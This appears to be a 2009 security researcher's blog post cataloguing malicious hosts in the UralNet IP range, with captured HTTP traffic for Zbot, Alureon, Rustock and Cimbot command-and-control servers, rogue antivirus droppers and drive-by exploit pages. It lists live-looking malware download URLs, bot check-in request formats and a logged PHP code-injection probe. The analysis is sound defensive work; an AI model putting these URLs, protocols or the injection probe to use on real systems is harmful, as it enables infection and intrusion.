I'm not actively picking on the Eastern Bloc, but finding purely malicious IP blocks there is duck soup. In this posting I'll be looking at UralNet, which is registered to an organization in Russia, but appears to be administered out of the Ukraine.
inetnum: 91.211.64.0 - 91.211.67.255
netname: Ural-NET
descr: Ural Industrial Limited Company
country: RU
address: Russia, 620240 Ekaterinburg, Sofia Kovalevsaja st.
origin: AS48511
role: UralNet IP Master
address: Ukraine, 69078 Kiev, Luteranskaya 28 st.
phone: +38 050 577 65 61
abuse-mailbox: abuse@uralnet.biz
netname: Ural-NET
descr: Ural Industrial Limited Company
country: RU
address: Russia, 620240 Ekaterinburg, Sofia Kovalevsaja st.
origin: AS48511
role: UralNet IP Master
address: Ukraine, 69078 Kiev, Luteranskaya 28 st.
phone: +38 050 577 65 61
abuse-mailbox: abuse@uralnet.biz
Interestingly, I can't pull an MX or A record for uralnet.biz. It doesn't appear they take abuse notifications too seriously. Robtex.com offers an excellent routing graph (to show who provides their upstream services) that I should have been including in the previous entries.
On 91.211.65.33 there are multiple variants of the Zbot trojan:
GET /ejik/admin.bin HTTP/1.1 (VirusTotal)
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 91.211.65.33
GET /ferrari/admin.exe HTTP/1.1 (VirusTotal)
Also it hosts the callback site:
POST /ejik/hot.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 91.211.65.33
Content-Length: 260
Connection: Keep-Alive
Cache-Control: no-cache
.M.C?.zY.....#.6Z....."....h.Z..1...:.k.9.".gR..2...s..
Additionally, it hosts a page where the malware can quickly figure out what its public IP is, as opposed
to its local IP which may be of the RFC1918 type. Comically, the script has some errors in the PHP code.
(psst, Zbot writer,<?php echo $_SERVER['REMOTE_ADDR']; ?>is all you need)
GET /ip.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)
Host: ramshabirthday.ru (91.211.65.33)
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)
Host: ramshabirthday.ru (91.211.65.33)
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 28 Feb 2009 09:22:33 GMT
Server: Apache/2
<br />
<b>Warning</b>: include_once(check.php) [<a href='function.include-once'>function.include-once</a>]: failed to open stream: No such file or directory in <b>/home/host1/domains/ramshabirthday.ru/public_html/ip.php</b> on line <b>2</b><br />
<br />
<b>Warning</b>: include_once() [<a href='function.include'>function.include</a>]: Failed opening 'check.php' for inclusion (include_path='.:/usr/local/lib/php') in <b>/home/host1/domains/ramshabirthday.ru/public_html/ip.php</b> on line <b>2</b><br />
Date: Sat, 28 Feb 2009 09:22:33 GMT
Server: Apache/2
<br />
<b>Warning</b>: include_once(check.php) [<a href='function.include-once'>function.include-once</a>]: failed to open stream: No such file or directory in <b>/home/host1/domains/ramshabirthday.ru/public_html/ip.php</b> on line <b>2</b><br />
<br />
<b>Warning</b>: include_once() [<a href='function.include'>function.include</a>]: Failed opening 'check.php' for inclusion (include_path='.:/usr/local/lib/php') in <b>/home/host1/domains/ramshabirthday.ru/public_html/ip.php</b> on line <b>2</b><br />
On 91.211.64.40 we can see more Zbot:
GET /sad/demo.exe HTTP/1.1
Host: zatura.cn
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Host: zatura.cn
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
On 91.211.64.155 I see even more Zbot malware, although the site seems to be currently unreachable
(it was responding yesterday)
GET /account/file1.exe HTTP/1.1
Host: onlinestat.cn
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Host: onlinestat.cn
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
I found this malware on 91.211.65.118 via MalwareDomainList - Seems like more Zbot
GET /vip/bum.exe HTTP/1.0
User-Agent: Wget/1.10.2 (Red Hat modified)
Accept: */*
Host: 91.211.65.118
Connection: Keep-Alive
User-Agent: Wget/1.10.2 (Red Hat modified)
Accept: */*
Host: 91.211.65.118
Connection: Keep-Alive
91.211.65.74 - redirects to malware, which turns out to be Trojan.Zlob
GET /?id=%2Fout.php%3Furls%3Dhttp%3A%2F%2Fporn_garbage HTTP/1.1
Accept: */*
Referer: http://www.gonzo-movies.com/
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR
2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
Connection: Keep-Alive
Host: pornorawa.com
Accept: */*
Referer: http://www.gonzo-movies.com/
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR
2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
Connection: Keep-Alive
Host: pornorawa.com
GET /Xvidcodec.exe HTTP/1.1
Host: pornorawa.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
91.211.65.120 is a generic dropper site for lots of different pieces of malware. The directory structure
suggests that they use it to distribute malware for many different sources (read: people/groups), but
this is speculation.
GET /myfiles/132/v3/file.exe HTTP/1.1
Host: 91.211.65.120
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
If-Modified-Since: Tue, 03 Mar 2009 01:01:59 GMT
Host: 91.211.65.120
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
If-Modified-Since: Tue, 03 Mar 2009 01:01:59 GMT
Also: hxxp://91.211.65.120/myfiles/5/1/file.exe
file.exe - Seems to be a generic dropper, but Microsoft (who seems to refuse "generic" malware names)
calls it Trojan.Alureon
1.exe - Backdoor.PcClient
91.211.64.91 is hosting another dropper (Trojan.Alueron)
GET /o9s833f/uerty/461.exe HTTP/1.1
Host: 91.211.64.91
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Host: 91.211.64.91
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
91.211.65.99 is redirecting to AntiVirus2009 (which incidently is hosted on 91.212.65.29, which
while only one number off, is not part of UralNet)
hxxp://onlinenotify.net/?a=ruler&code=49 -> hxxp://antivirus-xp-pro2009.com/cgi-bin/download.pl?code=49
91.211.64.33 is hosting another rogue as you can see below:
GET /promo/1/freescan.php?nu=77011812&back=%3Dxxxxx HTTP/1.1
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://livesex.com/?traffic=trafficholder
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12 (KHTML, like Gecko) Version/3.0.4 Safari/523.12
Connection: keep-alive
Host: proantimalwareonlinescan.com
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://livesex.com/?traffic=trafficholder
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12 (KHTML, like Gecko) Version/3.0.4 Safari/523.12
Connection: keep-alive
Host: proantimalwareonlinescan.com
91.211.64.68 hosts similar rogue AVs:
GET /download.php?nu=881068 HTTP/1.1
Host: www.liveantimalwarescanner.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.liveantimalwarescanner.com/promo/2/freescan.php?nu=881068&back=%3Dxxxx%3DO
Host: www.liveantimalwarescanner.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.liveantimalwarescanner.com/promo/2/freescan.php?nu=881068&back=%3Dxxxx%3DO
91.211.65.107 is hosting a Command and Control server for Rustock, one of the largest spam botnets:
POST /login.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: protectionforless.com
Content-Type: multipart/form-data
Content-Encoding: gzip
Content-Length: 96
Connection: Close
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: protectionforless.com
Content-Type: multipart/form-data
Content-Encoding: gzip
Content-Length: 96
Connection: Close
Pragma: no-cache
A few other malicious domains at that IP:
91.211.65.107-lekatariba.info
91.211.65.107-tlD9plg62.info
91.211.65.180 is hosting a C&C server for the Cimbot botnet. It has an interesting 3 stage
co mmunication that happens first over .gif files and then over SSL. Given its unique C&C structure, I'm
surprised this botnet hasn't gotten more play by the malware authors.
The first stage looks like this:
GET /account/l.php?[bot id which is a 52 character uppercase string] HTTP/1.1
Host: vazasaki-ji.info
Accept: */*
Connection: close
Host: vazasaki-ji.info
Accept: */*
Connection: close
It then sends back an md5 of data with the string 'fbc1' appended. This is pretty cute in that it looks like
a random 36 character string, but if you see a ton of them stacked up in Wireshark, it's pretty
obviously an md5 with 4 static characters appended
GET /account/d.php?data=[md5 + 'fbc1'] HTTP/1.1
Host: vazasaki-ji.info
Accept: */*
Connection: close
Cookie: PHPSESSID=xxxxxxxxxx
Host: vazasaki-ji.info
Accept: */*
Connection: close
Cookie: PHPSESSID=xxxxxxxxxx
The last stage of the client check-in looks like the below text. Hopefully Julia will have some time over
the next couple days to really delve into the communication, as the "hiding data in .gif files" is pretty
interesting
POST /account/p.php HTTP/1.1
Host: vazasaki-ji.info
Accept: */*
Content-Length: 51
Connection: close
Cookie: PHPSESSID=xxxxxxxxxx
Host: vazasaki-ji.info
Accept: */*
Content-Length: 51
Connection: close
Cookie: PHPSESSID=xxxxxxxxxx
There is a second Cimbot domain on that IP as well:
91.211.65.180-e-tochihara.info
91.211.65.99 (lastcountb.com) hit me with lsp.exe, which AVs have come to the conclusion is
somewhere between "TR/Crypt.XPACK.Gen, (Suspicious) - DNAScan, Suspicious File, Medium Risk
Malware, Mal/EncPk-FO, and Suspicious.MH690.A". Thanks for clearing that up.
GET /cgi-bin/promo.pl?code=0000131 HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)
Host: lastcountb.com
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)
Host: lastcountb.com
HTTP/1.1 200 OK
Date: Sat, 28 Feb 2009 18:58:04 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.8 with Suhosin-Patch mod_perl/1.30 mod_ssl/2.8.31 OpenSSL/0.9.8e
Content-Disposition: attachment; filename=lsp.exe
Content-Type: application/octet-stream;
Also on 91.211.65.99 is hxxp://onlinenotify.net/land/eurl/1.html?code=00000005 which redirected me
to:
91.211.65.100 which hit me with this rogue AV:
GET /cgi-bin/download.pl?code=00000005 HTTP/1.1
Host: antivirus-xp-pro2009.com
Referer: http://onlinenotify.net/land/eurl/1.html?code=00000005
Host: antivirus-xp-pro2009.com
Referer: http://onlinenotify.net/land/eurl/1.html?code=00000005
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2009 02:16:55 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.8 with Suhosin-Patch mod_perl/1.30 mod_ssl/2.8.31 OpenSSL/0.9.8e
Content-Disposition: attachment; filename=SetupAntivirusXP.exe
Going back to 91.211.65.99 (onlinenotify.net) I wanted to highlight some fun language, italicized for effect:
GET /winlogon.htm HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)
Host: onlinenotify.net
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)
Host: onlinenotify.net
Many viruses were found on your computer such as : Trojan horse, PassCapture, etc. Your
personal information can fall into in the "third hands". Please check up the computer with a
special software.
I agree, those "third hands" can be a real bugger.
Also on this IP:
91.211.65.99-freewebscaners.com
91.211.65.76 is hosting a ton of exploits, as most drive-by-download pages do.
Much of the traffic is getting driven/redirected from a malicious ad not hosted at UralNet-
hxxp://www.ads.havamedia.net/abm/abmw.aspx?z=166&isframe=true
The malicious server was being hosted at SoftLayer, but as has become customary when dealing with
them, they responded in approximately 3 minutes, confirmed the host was bad, and booted it offline.
Thanks, abuse team!
http://fannyniger.com/dol/index.php
/dol/load.php
/getfile.php?f=png
/dol/vparivatel.php
/dol/pdf.php?f=all
/dol/load.php
/getfile.php?f=png
/dol/vparivatel.php
/dol/pdf.php?f=all
Also on that IP are the malicious pages:
91.211.65.76-awasr.cn
91.211.65.76-givemelog.cn
91.211.64.68 is another address used by rogue AVs:
GET /promo/1/img/alert.gif HTTP/1.1
Host: proantimalwareonlinescan.com
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Referer: http://proantimalwareonlinescan.com/promo/1/freescan.php?nu=77024202&back=%3DTQy1zT4NYMNMI%3DM
Host: proantimalwareonlinescan.com
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Referer: http://proantimalwareonlinescan.com/promo/1/freescan.php?nu=77024202&back=%3DTQy1zT4NYMNMI%3DM
Also on this IP are the following malicious domains:
91.211.64.68-advancedproantivirusscan.com
91.211.64.68-bulletproofmonk.cn
91.211.64.68-promolegotools.cn
91.211.64.68-thebestworldparty.cn
91.211.64.68-verifyclickssystem.cn
91.211.65.76 - Some web exploits hosted here are being redirected from that earlier ad site:
GET /spl/index.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19
Referer: http://www.ads.havamedia.net/abm/abmw.aspx?z=166&isframe=true
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: givemelog.cn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19
Referer: http://www.ads.havamedia.net/abm/abmw.aspx?z=166&isframe=true
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: givemelog.cn
GET /spl/vparivatel.php?a HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.ads.havamedia.net/abm/abmw.aspx?z=166&isframe=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: givemelog.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.ads.havamedia.net/abm/abmw.aspx?z=166&isframe=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: givemelog.cn
GET /spl/vparivatel.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument,
application/xaml+xml, */*
Referer: http://givemelog.cn/spl/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;
NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: givemelog.cn
91.211.64.33 - More rogues:
GET /promo/1/freescan.php?nu=77000303&back=%3DDQy0DT4NYMNMI%3DN HTTP/1.1
Host: proantimalwareonlinescan.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://adsdeliverysystem.com/cmp/scr.php?a=754742&lang=en-US&id=435&ref=http://skreemr.com/results.jsp?q=reckoner+remix&search=SkreemR+Search
Host: proantimalwareonlinescan.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://adsdeliverysystem.com/cmp/scr.php?a=754742&lang=en-US&id=435&ref=http://skreemr.com/results.jsp?q=reckoner+remix&search=SkreemR+Search
91.211.65.120 - This is hosting updates for Trojan.Alureon
GET /banner/crcmds/main HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)
Host: 91.211.65.120
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)
Host: 91.211.65.120
Pragma: no-cache
91.211.65.23 - tinnily.info redirects me to hxxp://scan4zoom.com/22/?uid=122 which installed this
malware
GET /cgi-bin/redirect.pl?id=999901&ref=http%3A//kiffpuzevgolf.livejournal.com/5041.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword,
application/x-silverlight, */*
Accept-Language: ko
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14.52 from:
http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 2.0.50727)
Host: tinnily.info
Connection: Keep-Alive
91.211.65.23 - Another interesting redirector is hosted on this IP. My browser downloaded a "perl"
script as opposed to displaying it inline. Perhaps this page is traditionally included as opposed to surfed
to directly
GET /cgi-bin/weather.pl?id=412020&k=sophie+marceau+cannes&name=sxr020&ref= HTTP/1.0
User-Agent: Mozilla/3.01Gold (Macintosh; I; 68K)
Host: www.mypersonalhttp.com:8080
User-Agent: Mozilla/3.01Gold (Macintosh; I; 68K)
Host: www.mypersonalhttp.com:8080
Looking at that script you see the following obfuscation:
Deobfuscating (and reordering a bit) the above you can see an interesting tidbit - they are attempting to detect whether you are a crawler, and if so, the page won't redirect you to malware! That's one way the malware folks are trying to stay off the StopBadware (et. al) radar.
Other malicious sites on that IP:
91.211.65.23-australianpornomovies.com
91.211.65.23-warwork.info
91.211.65.110 - Tried to install this rogue AV
GET /hitin.php?land=20&affid=02401 HTTP/1.1
Host: stabilityscanonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)
Referer: http://crazypornride.com/mgp/0635cqj2/0404xyt/fcum.htm
Host: stabilityscanonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)
Referer: http://crazypornride.com/mgp/0635cqj2/0404xyt/fcum.htm
Mp3s are being sold illegally using these 8 A records for mp3sparks.com. Two are at ZlKon (Latvia),
two at UralNet (Russia/Ukraine), two at Honduras Web, and two registered to "hknetcom.biz" in Hong
Kong. The NS records for hknetcom.biz are ns1 and ns2.false.com - these people clearly are not a
legitimate company.
115.126.5.121, 94.247.3.33 91.211.65.12, 115.126.5.75, 200.63.45.6 - img.mp3sparks.com,
covers.mp3sparks.com
115.126.5.76, 94.247.3.34, 91.211.65.13, 115.126.5.122, 200.63.45.7 - mp3sparks.com,
www.mp3sparks.com
91.211.64.118 - Surfing to this exploit page...
GET /sss/in.cgi?7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://dvcd.info/evo/count.php?o=4
Accept-Language: en-us
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: porgacig.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://dvcd.info/evo/count.php?o=4
Accept-Language: en-us
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: porgacig.cn
...made my VM go and download this spambot malware.
GET /nuc/exe.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: hayboxiw.cn
Connection: Keep-Alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: hayboxiw.cn
Connection: Keep-Alive
Malware sites also on this IP:
91.211.64.118-ffseik.com
91.211.64.118-teirkmm.net
91.211.65.86 is hosting an "informational" page similar to ramshabirthday.ru/91.211.65.33 for the
malware owner to get a quick snapshot of the infected system.
POST http://russianwolf.ru/proxy5/check.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: russianwolf.ru
Pragma: no-cache
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: russianwolf.ru
Pragma: no-cache
Accept: */*
REQUEST_INFO_PAGE_4896485_CODE
REMOTE_ADDR=my_ip_address
HTTP_CLIENT_IP=
HTTP_X_FORWARDED_FOR=
HTTP_X_FORWARDED=
HTTP_X_COMING_FROM=
HTTP_FORWARDED_FOR=
HTTP_FORWARDED=
HTTP_COMING_FROM=
HTTP_VIA=
HTTP_XROXY_CONNECTION=
HTTP_PROXY_CONNECTION=
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_CONNECTION=keep-alive
GATEWAY_INTERFACE=CGI/1.1
REQUEST_METHOD=GET
HTTP_REFERER=
POST=
COOKIE=
REMOTE_ADDR=my_ip_address
HTTP_CLIENT_IP=
HTTP_X_FORWARDED_FOR=
HTTP_X_FORWARDED=
HTTP_X_COMING_FROM=
HTTP_FORWARDED_FOR=
HTTP_FORWARDED=
HTTP_COMING_FROM=
HTTP_VIA=
HTTP_XROXY_CONNECTION=
HTTP_PROXY_CONNECTION=
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_CONNECTION=keep-alive
GATEWAY_INTERFACE=CGI/1.1
REQUEST_METHOD=GET
HTTP_REFERER=
POST=
COOKIE=
91.211.65.25 has been hammering a few of my personal sites over the past few days looking for
exploits in various exploits in web applications that I don't have installed:
GET /rc/
GET /rcube-mail/
GET /roundcube/
GET /mail/
GET /roundcubemail-0.1beta2/
GET /rcube-mail/
GET /roundcube/
GET /mail/
GET /roundcubemail-0.1beta2/
POST /xxxxxxxx/gallery/albums/xxxxxxx.php HTTP/1.1
Accept: */*
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
f=echo+%282%2B2%29%3B&PARAM_HASH=xxxxxxxxxxxxx
91.211.64.87 is hosting a fake Youtube site. This is interesting in that it appears to load in the real
youtube.com content and uses CSS to convince you that you need to update your Flash player.
Youtube has actually pushed out Flash updates in the past when there is a particularly nasty
vulnerability, so I had to double check that it was malware. Which it was.
GET /?lang=en-yt&id=1&ef=&q=courteney+cox+longest+yard HTTP/1.1
Host: www.youtube.com.results-search.query.usasrv01.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)
Referer: http://xopysoki.com/i/liveold/?ref=http%3A//www.google.com/search%3Fq%3Dcourteney+cox+longest+yard%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a
Host: www.youtube.com.results-search.query.usasrv01.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)
Referer: http://xopysoki.com/i/liveold/?ref=http%3A//www.google.com/search%3Fq%3Dcourteney+cox+longest+yard%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a
91.211.64.180 - Another exploit page:
GET /cgi-bin/index.cgi?js HTTP/1.1
